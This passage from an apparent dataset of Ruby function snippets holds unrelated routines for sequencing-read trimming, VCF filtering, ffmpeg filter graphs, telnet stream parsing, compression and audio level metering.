{|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def filters\n fail Error, \"Nothing to roll...\" unless @reels\n fail Error, \"Supporting just full_screen for now, sorry.\" unless @reels.all?(&:full_screen?)\n return @filters if @filters\n\n idx = process.output_index(self)\n\n @filters = []\n\n # Concatting\n segments = []\n\n @reels.each_with_index do |curr_reel, i|\n\n lbl = nil\n\n if curr_reel.reel\n\n # NOTE mapping input to this lbl\n\n lbl = \"o#{idx}rl#{i}\"\n\n # NOTE Image-Padding to match the target resolution\n # TODO full screen only at the moment (see exception above)\n\n Ffmprb.logger.debug \"#{self} asking for filters of #{curr_reel.reel.io.inspect} video: #{channel(:video)}, audio: #{channel(:audio)}\"\n @filters.concat(\n curr_reel.reel.filters_for lbl, video: channel(:video), audio: channel(:audio)\n )\n end\n\n trim_prev_at = curr_reel.after || (curr_reel.transition && 0)\n transition_length = curr_reel.transition ? curr_reel.transition.length : 0\n\n if trim_prev_at\n\n # NOTE make sure previous reel rolls _long_ enough AND then _just_ enough\n\n prev_lbl = segments.pop\n\n lbl_pad = \"bl#{prev_lbl}#{i}\"\n # NOTE generously padding the previous segment to support for all the cases\n @filters.concat(\n Filter.blank_source trim_prev_at + transition_length,\n channel(:video).resolution, channel(:video).fps, \"#{lbl_pad}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.silent_source trim_prev_at + transition_length, \"#{lbl_pad}:a\"\n ) if channel?(:audio)\n\n if prev_lbl\n lbl_aux = lbl_pad\n lbl_pad = \"pd#{prev_lbl}#{i}\"\n @filters.concat(\n Filter.concat_v [\"#{prev_lbl}:v\", \"#{lbl_aux}:v\"], \"#{lbl_pad}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.concat_a [\"#{prev_lbl}:a\", \"#{lbl_aux}:a\"], \"#{lbl_pad}:a\"\n ) if channel?(:audio)\n end\n\n if curr_reel.transition\n\n # NOTE Split the previous segment for transition\n\n if trim_prev_at > 0\n @filters.concat(\n Filter.split \"#{lbl_pad}:v\", [\"#{lbl_pad}a:v\", \"#{lbl_pad}b:v\"]\n ) if channel?(:video)\n @filters.concat(\n Filter.asplit \"#{lbl_pad}:a\", [\"#{lbl_pad}a:a\", \"#{lbl_pad}b:a\"]\n ) if channel?(:audio)\n lbl_pad, lbl_pad_ = \"#{lbl_pad}a\", \"#{lbl_pad}b\"\n else\n lbl_pad, lbl_pad_ = nil, lbl_pad\n end\n end\n\n if lbl_pad\n\n # NOTE Trim the previous segment finally\n\n new_prev_lbl = \"tm#{prev_lbl}#{i}a\"\n\n @filters.concat(\n Filter.trim 0, trim_prev_at, \"#{lbl_pad}:v\", \"#{new_prev_lbl}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.atrim 0, trim_prev_at, \"#{lbl_pad}:a\", \"#{new_prev_lbl}:a\"\n ) if channel?(:audio)\n\n segments << new_prev_lbl\n Ffmprb.logger.debug \"Concatting segments: #{new_prev_lbl} pushed\"\n end\n\n if curr_reel.transition\n\n # NOTE snip the end of the previous segment and combine with this reel\n\n lbl_end1 = \"o#{idx}tm#{i}b\"\n lbl_reel = \"o#{idx}tn#{i}\"\n\n if !lbl # no reel\n lbl_aux = \"o#{idx}bk#{i}\"\n @filters.concat(\n Filter.blank_source transition_length, channel(:video).resolution, channel(:video).fps, \"#{lbl_aux}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.silent_source transition_length, \"#{lbl_aux}:a\"\n ) if channel?(:audio)\n end # NOTE else hope lbl is long enough for the transition\n\n @filters.concat(\n Filter.trim trim_prev_at, trim_prev_at + transition_length, \"#{lbl_pad_}:v\", \"#{lbl_end1}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.atrim trim_prev_at, trim_prev_at + transition_length, \"#{lbl_pad_}:a\", \"#{lbl_end1}:a\"\n ) if channel?(:audio)\n\n # TODO the only supported transition, see #*lay\n @filters.concat(\n 
Filter.blend_v transition_length, channel(:video).resolution, channel(:video).fps, [\"#{lbl_end1}:v\", \"#{lbl || lbl_aux}:v\"], \"#{lbl_reel}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.blend_a transition_length, [\"#{lbl_end1}:a\", \"#{lbl || lbl_aux}:a\"], \"#{lbl_reel}:a\"\n ) if channel?(:audio)\n\n lbl = lbl_reel\n end\n\n end\n\n segments << lbl # NOTE can be nil\n end\n\n segments.compact!\n\n lbl_out = segments[0]\n\n if segments.size > 1\n lbl_out = \"o#{idx}o\"\n\n @filters.concat(\n Filter.concat_v segments.map{|s| \"#{s}:v\"}, \"#{lbl_out}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.concat_a segments.map{|s| \"#{s}:a\"}, \"#{lbl_out}:a\"\n ) if channel?(:audio)\n end\n\n # Overlays\n\n # NOTE in-process overlays first\n\n @overlays.to_a.each_with_index do |over_reel, i|\n next if over_reel.duck # NOTE this is currently a single case of multi-process... process\n\n fail Error, \"Video overlays are not implemented just yet, sorry...\" if over_reel.reel.channel?(:video)\n\n # Audio overlaying\n\n lbl_nxt = \"o#{idx}o#{i}\"\n\n lbl_over = \"o#{idx}l#{i}\"\n @filters.concat( # NOTE audio only, see above\n over_reel.reel.filters_for lbl_over, video: false, audio: channel(:audio)\n )\n @filters.concat(\n Filter.copy \"#{lbl_out}:v\", \"#{lbl_nxt}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.amix_to_first_same_volume [\"#{lbl_out}:a\", \"#{lbl_over}:a\"], \"#{lbl_nxt}:a\"\n ) if channel?(:audio)\n\n lbl_out = lbl_nxt\n end\n\n # NOTE multi-process overlays last\n\n @channel_lbl_ios = {} # XXX this is a spaghetti machine\n @channel_lbl_ios[\"#{lbl_out}:v\"] = io if channel?(:video)\n @channel_lbl_ios[\"#{lbl_out}:a\"] = io if channel?(:audio)\n\n # TODO supporting just \"full\" overlays for now, see exception in #add_reel\n @overlays.to_a.each_with_index do |over_reel, i|\n\n # NOTE this is currently a single case of multi-process... process\n if over_reel.duck\n fail Error, \"Don't know how to duck video... yet\" if over_reel.duck != :audio\n\n Ffmprb.logger.info \"ATTENTION: ducking audio (due to the absence of a simple ffmpeg filter) does not support streaming main input. 
yet.\"\n\n # So ducking just audio here, ye?\n # XXX check if we're on audio channel\n\n main_av_o = @channel_lbl_ios[\"#{lbl_out}:a\"]\n fail Error, \"Main output does not contain audio to duck\" unless main_av_o\n\n intermediate_extname = Process.intermediate_channel_extname video: main_av_o.channel?(:video), audio: main_av_o.channel?(:audio)\n main_av_inter_i, main_av_inter_o = File.threaded_buffered_fifo(intermediate_extname, reader_open_on_writer_idle_limit: Util::ThreadedIoBuffer.timeout * 2, proc_vis: process)\n @channel_lbl_ios.each do |channel_lbl, io|\n @channel_lbl_ios[channel_lbl] = main_av_inter_i if io == main_av_o # XXX ~~~spaghetti\n end\n process.proc_vis_edge process, main_av_o, :remove\n process.proc_vis_edge process, main_av_inter_i\n Ffmprb.logger.debug \"Re-routed the main audio output (#{main_av_inter_i.path}->...->#{main_av_o.path}) through the process of audio ducking\"\n\n over_a_i, over_a_o = File.threaded_buffered_fifo(Process.intermediate_channel_extname(audio: true, video: false), proc_vis: process)\n lbl_over = \"o#{idx}l#{i}\"\n @filters.concat(\n over_reel.reel.filters_for lbl_over, video: false, audio: channel(:audio)\n )\n @channel_lbl_ios[\"#{lbl_over}:a\"] = over_a_i\n process.proc_vis_edge process, over_a_i\n Ffmprb.logger.debug \"Routed and buffering auxiliary output fifos (#{over_a_i.path}>#{over_a_o.path}) for overlay\"\n\n inter_i, inter_o = File.threaded_buffered_fifo(intermediate_extname, proc_vis: process)\n Ffmprb.logger.debug \"Allocated fifos to buffer media (#{inter_i.path}>#{inter_o.path}) while finding silence\"\n\n ignore_broken_pipes_was = process.ignore_broken_pipes # XXX maybe throw an exception instead?\n process.ignore_broken_pipes = true # NOTE audio ducking process may break the overlay pipe\n\n Util::Thread.new \"audio ducking\" do\n process.proc_vis_edge main_av_inter_o, inter_i # XXX mark it better\n silence = Ffmprb.find_silence(main_av_inter_o, inter_i)\n\n Ffmprb.logger.debug \"Audio ducking with silence: [#{silence.map{|s| \"#{s.start_at}-#{s.end_at}\"}.join ', '}]\"\n\n Process.duck_audio inter_o, over_a_o, silence, main_av_o,\n process_options: {parent: process, ignore_broken_pipes: ignore_broken_pipes_was, timeout: process.timeout},\n video: channel(:video), audio: channel(:audio)\n end\n end\n\n end\n\n @filters\n end",
"def filter_lengths(strings, length=5)\n big_words = []\n strings.each { |ele| big_words << ele if ele.length >= length }\n return big_words\nend",
"def filter_samples(files)\n files.reject { |f| sample?(f) }\n end",
"def readpartial(maxlen=99, buf=\"buffer\") end",
"def ignore_bad_chunking; end",
"def ignore_bad_chunking; end",
"def make_subset(args={}) \n start, stop = args[:start], args[:stop]\n records = args[:records]\n out_folder = args[:out_folder]\n \n # output full records\n File.open(\"#{out_folder}/full.fasta\", 'w') do |handle|\n records.each do |record|\n handle.puts record\n end\n end\n \n # Output truncated records\n nucleotides = 0\n i = 0\n while (nucleotides/sample_size.to_f < (stop - start))\n i += 1\n records.each do |record|\n n = record.sequence[i]\n # normal and ambiguous nucleotides\n if n =~ /[RYSWKMBDHVNGAUTC]/i\n nucleotides += 1\n elsif n =~ /[-\\.]/\n # do nothing about gaps\n else\n fail \"weird character: #{n}\"\n end\n end\n end\n \n File.open(\"#{out_folder}/truncated.fasta\", 'w') do |handle|\n records.each do |record|\n handle.puts \">#{record.name}\\n#{record.sequence[start, start+i]}\"\n end\n end\nend",
"def strict_filters=(_arg0); end",
"def valid_quality?\n quality < MAX_QUALITY && quality > MIN_QUALITY\n end",
"def quality(factor=0.8)\n @quality = factor\n end",
"def recording_length(playbacks)\n # Looping through playbacks array and returning first non-zero length value\n playbacks.each do |playback|\n length = playback[:length]\n return recording_length_string(length) unless length.zero?\n end\n # Return '< 1 min' if length values are zero\n \"< 1 min\"\n end",
"def filter!; end",
"def resampling_required?\n flac_info.streaminfo[\"samplerate\"] != target_sample_rate\n end",
"def add_result_trimmed_reads(base, _opts)\n return nil unless result_files_exist?(base, '.1.clipped.fastq')\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n if result_files_exist?(base, '.2.clipped.fastq')\n {\n pair1: '.1.clipped.fastq',\n pair2: '.2.clipped.fastq',\n single: '.1.clipped.single.fastq'\n }\n else\n { single: '.1.clipped.fastq' }\n end\n ).tap do |r|\n r.add_file(:trimming_sumary, \"#{name}.1.fastq.trimmed.summary.txt\")\n end\n end",
"def limited_samples\n results = positive_samples\n limit = results.map{|x| x[:value]}.max * LIMIT\n results.select{|x| x[:value] > limit}\n end",
"def main \n settings = {}\n settings[\"--minAD\"] = 6 ## min # of reads carrying alternative allele for SNV\n settings[\"--minADIndel\"] = 8 ## min # of reads carrying alternative allele for indel\n settings[\"--minDP\"] = 12 # min depth in parents\n settings[\"--phenotype\"] = \"\"\n settings[\"--minPL\"] = 70\n settings[\"--minPLP\"] = 30\n settings[\"--minPLIndel\"] = 80\n settings[\"--maxAAF\"] = 0.015\n settings[\"--maxFreq\"] = 0.001\n settings[\"--maxAC\"] = 3\n\n optHash = getopt()\n vcf = optHash[\"--vcf\"]\n \n settings[\"--output\"] = vcf \n settings[\"--header\"] = vcf\n settings.keys.sort.each do |s|\n if optHash.key?(s) \n if s == \"--phenotype\" or s == \"--output\" or s == \"--header\"\n settings[s] = optHash[s]\n else\n settings[s] = optHash[s].to_f\n end\n end\n end\n \n\n samples=countSamples(settings[\"--phenotype\"], settings[\"--header\"])\n\n # $stderr.puts samples\n \n filterVCF(vcf,settings,samples) # gt: gene -> pos -> sample -> genotype, \n\nend",
"def add_result_trimmed_reads(base, _opts)\n return nil unless result_files_exist?(base, '.1.clipped.fastq')\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n if result_files_exist?(base, '.2.clipped.fastq')\n { pair1: '.1.clipped.fastq', pair2: '.2.clipped.fastq' }\n else\n { single: '.1.clipped.fastq' }\n end\n ).tap do |r|\n # Legacy files\n r.add_file(:trimming_sumary, \"#{name}.1.fastq.trimmed.summary.txt\")\n r.add_file(:single, \"#{name}.1.clipped.single.fastq\")\n end\n end",
"def lowpass! cutoff_freq, order\n filter = SincFilter.new(:sample_rate => @sample_rate, :order => order, :cutoff_freq => cutoff_freq)\n @data = filter.lowpass(@data)\n return self\n end",
"def collapse!\n run_command(\"mogrify\", \"-quality\", \"100\", \"#{path}[0]\")\n end",
"def ignore_bad_chunking=(_arg0); end",
"def low_note\n return @notes.min_by { |note| note.pitch } \n end",
"def filterFormants(fs)\n fs.delete_if { |f| f[0] < $MIN_F1 || f[0] > $MAX_F1 || f[1] > $MIN_F2 || f[1] < $MAX_F2}\nend",
"def delete_small!\n @contents.delete_if do |c|\n# ((c[1] - c[0]) < @image.min_content_size*0.6) or\n ((c[1] - c[0]) < @image.min_obj_size) or\n ((c[0] - @image.min_obj_size <= 0) and (c[2]<@image.min_content_size)) or\n ((c[1] + @image.min_obj_size >= @projection.size) and (c[2]<@image.min_content_size))\n end\n end",
"def saturation\n filter.cardinality / filter.size.to_f\n end",
"def quality\n return self.sendcmd(\"modem.get_quality\")\n end",
"def trim_buffer\n trim_size = @buffer.size - @max_items\n trim_size = 0 if trim_size < 0\n @buffer.shift(trim_size)\n end",
"def quality(level)\n with_command \"-quality #{level}\"\n end",
"def read_nonblock(maxlen=99, buf=\"buffer\") end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def trim\n return if skip_step?(@names.get('trim'), 'trimming')\n run_cmd(\\\n 'fastx_trimmer -Q33 -f 2' \\\n \" -i #{@names.get('clip')}\" \\\n \" -o #{@names.get('trim')}\"\n )\n end",
"def collapse!(frame = 0)\n mogrify(frame) { |builder| builder.quality(100) }\n end",
"def threshold(text, threshold: false)\n thresh = (word_frequency(text).select { |k, v| v > 4})\n threshold ? thresh.reject {|k,v| k.length < 6} : thresh.reject {|k,v| k.length < 4}\nend",
"def size_range\n CARRIERWAVE_MAX_FILE_SIZE\n end",
"def filter_in(str)\n# init_subneg\n return \"\" if str.nil? || str.empty?\n buf = \"\"\n\n @sc ? @sc.concat(str) : @sc = StringScanner.new(str)\n while b = @sc.get_byte\n\n # OOB sync data\n if @pstack.urgent_on || b.getbyte(0) == DM\n log.debug(\"(#{@pstack.conn.object_id}) Sync mode on\")\n @pstack.urgent_on = false\n @synch = true\n break\n end\n\n case mode?\n when :normal\n case b.getbyte(0)\n when CR\n next if @synch\n set_mode(:cr) if !@pstack.binary_on\n when LF # LF or LF/CR may be issued by broken mud servers and clients\n next if @synch\n set_mode(:lf) if !@pstack.binary_on\n buf << LF.chr\n echo(CR.chr + LF.chr)\n when IAC\n set_mode(:cmd)\n when NUL # ignore NULs in stream when in normal mode\n next if @synch\n if @pstack.binary_on\n buf << b\n echo(b)\n else\n log.debug(\"(#{@pstack.conn.object_id}) unexpected NUL found in stream\")\n end\n when BS, DEL\n next if @synch\n # Leaves BS, DEL in input stream for higher filter to deal with.\n buf << b\n echo(BS.chr)\n else\n next if @synch\n ### NOTE - we will allow 8-bit NVT against RFC 1123 recommendation \"should not\"\n ###\n # Only let 7-bit values through in normal mode\n #if (b[0] & 0x80 == 0) && !@pstack.binary_on\n buf << b\n echo(b)\n #else\n # log.debug(\"(#{@pstack.conn.object_id}) unexpected 8-bit byte found in stream '#{b[0]}'\")\n #end\n end\n when :cr\n # handle CRLF and CRNUL by insertion of LF into buffer\n case b.getbyte(0)\n when LF\n buf << LF.chr\n echo(CR.chr + LF.chr)\n when NUL\n if @server.service_type == :client # Don't xlate CRNUL when client\n buf << CR.chr\n echo(CR.chr)\n else\n buf << LF.chr\n echo(CR.chr + LF.chr)\n end\n else # eat lone CR\n buf << b\n echo(b)\n end\n set_mode(:normal)\n when :lf\n # liberally handle LF, LFCR for clients that aren't telnet correct\n case b.getbyte(0)\n when CR # Handle LFCR by swallowing CR\n else # Handle other stuff that follows - single LF\n buf << b\n echo(b)\n end\n set_mode(:normal)\n when :cmd\n case b.getbyte(0)\n when IAC\n # IAC escapes IAC\n buf << IAC.chr\n set_mode(:normal)\n when AYT\n log.debug(\"(#{@pstack.conn.object_id}) AYT sent - Msg returned\")\n @pstack.conn.sock.send(\"TeensyMUD is here.\\n\",0)\n set_mode(:normal)\n when AO\n log.debug(\"(#{@pstack.conn.object_id}) AO sent - Synch returned\")\n @pstack.conn.sockio.write_flush\n @pstack.conn.sock.send(IAC.chr + DM.chr, 0)\n @pstack.conn.sockio.write_urgent(DM.chr)\n set_mode(:normal)\n when IP\n @pstack.conn.sockio.read_flush\n @pstack.conn.sockio.write_flush\n log.debug(\"(#{@pstack.conn.object_id}) IP sent\")\n set_mode(:normal)\n when GA, NOP, BRK # not implemented or ignored\n log.debug(\"(#{@pstack.conn.object_id}) GA, NOP or BRK sent\")\n set_mode(:normal)\n when DM\n log.debug(\"(#{@pstack.conn.object_id}) Synch mode off\")\n @synch = false\n set_mode(:normal)\n when EC\n next if @synch\n log.debug(\"(#{@pstack.conn.object_id}) EC sent\")\n if buf.size > 1\n buf.slice!(-1)\n elsif @pstack.conn.inbuffer.size > 0\n @pstack.conn.inbuffer.slice(-1)\n end\n set_mode(:normal)\n when EL\n next if @synch\n log.debug(\"(#{@pstack.conn.object_id}) EL sent\")\n p = buf.rindex(\"\\n\")\n if p\n buf.slice!(p+1..-1)\n else\n buf = \"\"\n p = @pstack.conn.inbuffer.rindex(\"\\n\")\n if p\n @pstack.conn.inbuffer.slice!(p+1..-1)\n end\n end\n set_mode(:normal)\n when DO, DONT, WILL, WONT\n if @sc.eos?\n @sc.unscan\n break\n end\n opt = @sc.get_byte\n case b.getbyte(0)\n when WILL\n replies_him(opt.getbyte(0),true)\n when WONT\n replies_him(opt.getbyte(0),false)\n when DO\n 
requests_us(opt.getbyte(0),true)\n when DONT\n requests_us(opt.getbyte(0),false)\n end\n # Update interesting things in ProtocolStack after negotiation\n case opt.getbyte(0)\n when ECHO\n @pstack.echo_on = enabled?(ECHO, :us)\n when BINARY\n @pstack.binary_on = enabled?(BINARY, :us)\n when ZMP\n @pstack.zmp_on = enabled?(ZMP, :us)\n end\n set_mode(:normal)\n when SB\n @sc.unscan\n break if @sc.check_until(/#{IAC.chr}#{SE.chr}/).nil?\n @sc.get_byte\n opt = @sc.get_byte\n data = @sc.scan_until(/#{IAC.chr}#{SE.chr}/).chop.chop\n parse_subneg(opt.getbyte(0),data)\n set_mode(:normal)\n else\n log.debug(\"(#{@pstack.conn.object_id}) Unknown Telnet command - #{b.getbyte(0)}\")\n set_mode(:normal)\n end\n end\n end # while b\n\n @sc = nil if @sc.eos?\n buf\n end",
"def long_question (quest_arr)\n quest_arr.select { |question| question.size > 15 }\nend",
"def filter_generator; end",
"def print_streams(streams)\n vals = steams.map{|s| s.read}\n while true\n min = vals.min\n i = vals.index(min)\n p min\n vals[i] = streams[i].read\n end\nend",
"def smoothing; end",
"def filterPhixReadsCmd(bamFile)\n jarName = @javaDir + \"/PhixFilterFromBAM.jar\"\n cmd = \"time java \" + @heapSize + \" -jar \" + jarName + \" I=\" + bamFile\n return cmd\n end",
"def fit_to(len, fade_frames=250)\n meant_to_be = len\n self.dps.pop(dps.count- meant_to_be) if meant_to_be < dps.count\n while meant_to_be > dps.count # too short\n self.dps.push 0\n end\n # stop the annoying popping\n if dps.count > fade_frames\n fade_frames.times do |i|\n dps[dps.count-1-i] *= i.to_f / fade_frames\n end\n end\n self\nend",
"def read_blocked\n end",
"def prune_samples(at)\n cutoff = at - @interval\n while @samples.size > 1 && (@samples.first.first < cutoff)\n @samples.shift\n end\n end",
"def constrained_bitrate\n @bitrate * 1.1\n end",
"def _process_queue\n [@queue.length, @max_minifiers - @working_minifiers.length].min.times {\n _spawn_minifier\n }\n end",
"def exec_seq(seq,blast_query)\n\n if ((self.class.to_s=='PluginLowQuality') && seq.seq_qual.nil? ) \n $LOG.debug \" Quality File haven't been provided. It's impossible to execute \" + self.class.to_s \n elsif ((seq.seq_qual.size>0) && (@params.get_param('use_qual').to_s=='true'))\n \n $LOG.debug \"[#{self.class.to_s}, seq: #{seq.seq_name}]: checking low quality of the sequence\"\n \n min_quality=@params.get_param('min_quality').to_i\n min_length_inside_seq=@params.get_param('min_length_inside_seq').to_i\n max_consecutive_good_bases=@params.get_param('max_consecutive_good_bases').to_i\n \n type='ActionLowQuality'\n actions=[]\n \n regions=get_low_qual_regions(seq.seq_qual,min_quality,min_length_inside_seq,max_consecutive_good_bases)\n \n regions.each do |r|\n low_qual_size=r.last-r.first+1\n \n # puts \"(#{low_qual_size}) = [#{r.first},#{r.last}]: #{a[r.first..r.last].map{|e| (\"%2d\" % e.to_s)}.join(' ')}\"\n \n \n add_stats('low_qual',low_qual_size)\n \n \n # create action\n a = seq.new_action(r.first,r.last,type) # adds the correspondent action to the sequence\n actions.push a\n \n \n \n end\n\n # add quals\n seq.add_actions(actions)\n end \n\n end",
"def writeFinalSequenceFrag()\n outFile = File.new(@seqNameRead1, \"w\")\n\n @read1FileList.each do |file|\n reader = Zlib::GzipReader.open(file)\n while(line = reader.gets)\n line.strip!\n\n if line.match(/^@/)\n @numReadsRead1 = @numReadsRead1 + 1\n\n # Read next 3 lines to complete reading 1 Fastq record\n readString = reader.gets.strip\n qualHeader = reader.gets.strip\n qualString = reader.gets.strip\n\n if line.match(/\\s\\d:N:/)\n @numFilteredRead1 = @numFilteredRead1 + 1\n writeFastqRecordToFile(outFile, line, readString, qualHeader,\n qualString)\n end\n end\n end\n reader.close\n end\n outFile.close\n end",
"def compress\n return :input_too_short if buf.size < 2\n return :input_too_large if buf.size > 0xFFFFFF\n\n outstream = ArrayOStream.new\n .u8(0x11).u16(buf.size).u8(buf.size >> 16)\n\n outbuffer = [8 * 4 + 1] * 33\n outbuffer[0] = 0\n bufferlength = 1\n bufferedBlocks = 0\n readBytes = 0\n while readBytes < buf.size\n if bufferedBlocks == 8\n outstream.write(outbuffer[0, bufferlength])\n outbuffer[0] = 0\n bufferlength = 1\n bufferedBlocks = 0\n end\n\n oldLength = [readBytes, 0x1000].min\n disp, length = occurrence_length(readBytes,\n [buf.size - readBytes, 0x10110].min, readBytes - oldLength, oldLength)\n if length < 3\n outbuffer[bufferlength] = buf[readBytes]\n readBytes += 1\n bufferlength += 1\n else\n readBytes += length\n outbuffer[0] |= (1 << (7 - bufferedBlocks)) & 0xFF\n case\n when length > 0x110\n outbuffer[bufferlength] = 0x10\n outbuffer[bufferlength] |= ((length - 0x111) >> 12) & 0x0F\n bufferlength += 1\n outbuffer[bufferlength] = ((length - 0x111) >> 4) & 0xFF\n bufferlength += 1\n outbuffer[bufferlength] = ((length - 0x111) << 4) & 0xF0\n when length > 0x10\n outbuffer[bufferlength] = 0x00\n outbuffer[bufferlength] |= ((length - 0x111) >> 4) & 0x0F\n bufferlength += 1\n outbuffer[bufferlength] = ((length - 0x111) << 4) & 0xF0\n else\n outbuffer[bufferlength] = ((length - 1) << 4) & 0xF0\n end\n outbuffer[bufferlength] |= ((disp - 1) >> 8) & 0x0F\n bufferlength += 1\n outbuffer[bufferlength] = (disp - 1) & 0xFF\n bufferlength += 1\n end\n\n bufferedBlocks += 1\n end\n\n if bufferedBlocks > 0\n outstream.write(outbuffer[0, bufferlength])\n end\n\n outstream.buf\n end",
"def trim_data\n self.angular_resolution = self.angular_resolution.round(3)\n self.magnitude = self.magnitude.round(3)\n end",
"def small\n filter << 'Size:Small'\n self\n end",
"def quality(qual = nil)\n @quality = qual || 1 if @quality.nil?\n @quality\n end",
"def compression_was_achieved\n return compression_ratio() < 1\n end",
"def initialize(infile)\n @minimum_level_positive = -1 * MINIMUM_LEVEL # convert that only once, to save CPU power\n \n @mainloop = GLib::MainLoop.new(GLib::MainContext.default, true);\n\n @pipeline = Gst::Pipeline.new(\"levelmeter\")\n \n @source = Gst::ElementFactory.make(\"filesrc\")\n @source.location = infile \n\n @convertor = Gst::ElementFactory.make(\"audioconvert\")\n\n @level = Gst::ElementFactory.make(\"level\", LEVEL_ELEMENT_NAME)\n @level.interval = INTERVAL\n @level.message = true\n\n @sink = Gst::ElementFactory.make(\"autoaudiosink\")\n\n @decoder = Gst::ElementFactory.make(\"decodebin\")\n @decoder.signal_connect(\"new-decoded-pad\") do | dbin, pad, is_last |\n pad.link @convertor.get_pad(\"sink\")\n @convertor >> @level >> @sink\n end\n\n @pipeline.add @source, @decoder, @convertor, @level, @sink\n @source >> @decoder\n\n @pipeline.bus.add_watch do | bus, message |\n case message.type\n when Gst::Message::Type::ERROR\n $stderr.puts \"Error\"\n @mainloop.quit\n exit 1\n\n when Gst::Message::Type::EOS\n @pipeline.stop\n @mainloop.quit\n exit 0\n\n when Gst::Message::Type::ELEMENT\n if message.source.name == LEVEL_ELEMENT_NAME\n channels = message.structure[\"peak\"].size\n channels.times do |i|\n peak = message.structure[\"peak\"][i] > MINIMUM_LEVEL ? (METER_WIDTH * (message.structure[\"peak\"][i]) / @minimum_level_positive).round + METER_WIDTH : 0\n rms = message.structure[\"rms\"][i] > MINIMUM_LEVEL ? (METER_WIDTH * (message.structure[\"rms\"][i]) / @minimum_level_positive).round + METER_WIDTH : 0\n\n # Temporary array used to draw the bars. Maybe not too efficient but simple\n x = []\n x[0] = \"[\"\n x[METER_WIDTH+2] = \"]\"\n\n (1..METER_WIDTH+1).each{ |j| x[j] = \" \" }\n (1..peak+1).each{ |j| x[j] = \"=\" }\n x[rms+1] = \"#\"\n x[peak+1] = \"|\"\n\n puts \"#{i} #{x.join} peak: #{sprintf(\"%.2f\", message.structure[\"peak\"][i])}dB, RMS: #{sprintf(\"%.2f\", message.structure[\"rms\"][i])}dB\"\n end\n xaxis_left = \" #{sprintf(\"%.2f\", MINIMUM_LEVEL)}dB\"\n xaxis_right = \"0dB\"\n \n puts xaxis_left + \" \" * (METER_WIDTH + 2 - xaxis_left.size) + xaxis_right\n end\n end\n true\n end\n end",
"def min_length\n 0\n end",
"def find_truncated_sequence(uri, sorted_sequences, target_length)\n sorted_sequences.find do |seq|\n (uri.special_format.length - seq.length + SEPARATOR.length) <= target_length\n end\n end",
"def init_filter(elements, fp_rate)\n ln2 = Math.log(2)\n\n # using #ceil instead of #floor may be better, but it's bitcoinj's way\n\n calc_m = (-Math.log(fp_rate) * elements / ln2 / ln2 / 8).floor\n @filter_size = [1, [calc_m, MAX_FILTER_SIZE].min].max\n @filter = \"\\x00\" * @filter_size\n\n calc_k = (@filter_size * 8 * ln2 / elements).floor\n @nfunc = [1, [calc_k, MAX_HASH_FUNCS].min].max\n end",
"def sounds_flatter?(freq1, freq2)\n threshold = freq2 * (1 - FREQUENCY_FUDGE_FACTOR)\n freq1 < threshold\n end",
"def quality\n return PRECISE unless within_range?\n return ULTRA_PRECISE if standard_deviation < 3.0\n return VERY_PRECISE if standard_deviation < 5.0\n PRECISE\n end",
"def main \n settings = {}\n settings[\"--missing\"]=0.8\n settings[\"--mq\"]=20\n settings[\"--zmq\"]=0.4 # ((MQ0 / (1.0 * DP)) > $zmq \n settings[\"--freq\"] = -1 # default no filter\n settings[\"--ac\"] = 0 \n settings[\"--maxfreq\"]=1 # default no filter\n # ab=0.95 # allele balance\n settings[\"--qual\"]=50.0 # min qual\n# settings[\"--clusterWinSize\"]=10 # --clusterWindowSize = 10\n settings[\"--HRun\"]=5 # homopolymer\n settings[\"--qd\"]=5.0 # qual over depth cutoff \n settings[\"--sb\"]=-0.1 # strand bias\n settings[\"--minDP\"]=5 # average DP per sample, need to multiply by nsample\n \n optHash = getopt()\n vcf = optHash[\"--vcf\"]\n \n settings.keys.sort.each do |s|\n if optHash.key?(s)\n settings[s] = optHash[s].to_f\n end\n end\n \n# if optHash.key?(\"--indelMask\")\n# settings[\"--indelMask\"] = optHash[\"--indelMask\"]\n# end\n \n nsample=countSamples(vcf)\n \n filterVCF(vcf,settings,nsample) # gt: gene -> pos -> sample -> genotype, \n\nend",
"def check_queue_size_incoming\n `#{config[:path]} | /bin/egrep -c '^[0-9A-F]+ +'`.to_i - check_queue_size_deferred\n end",
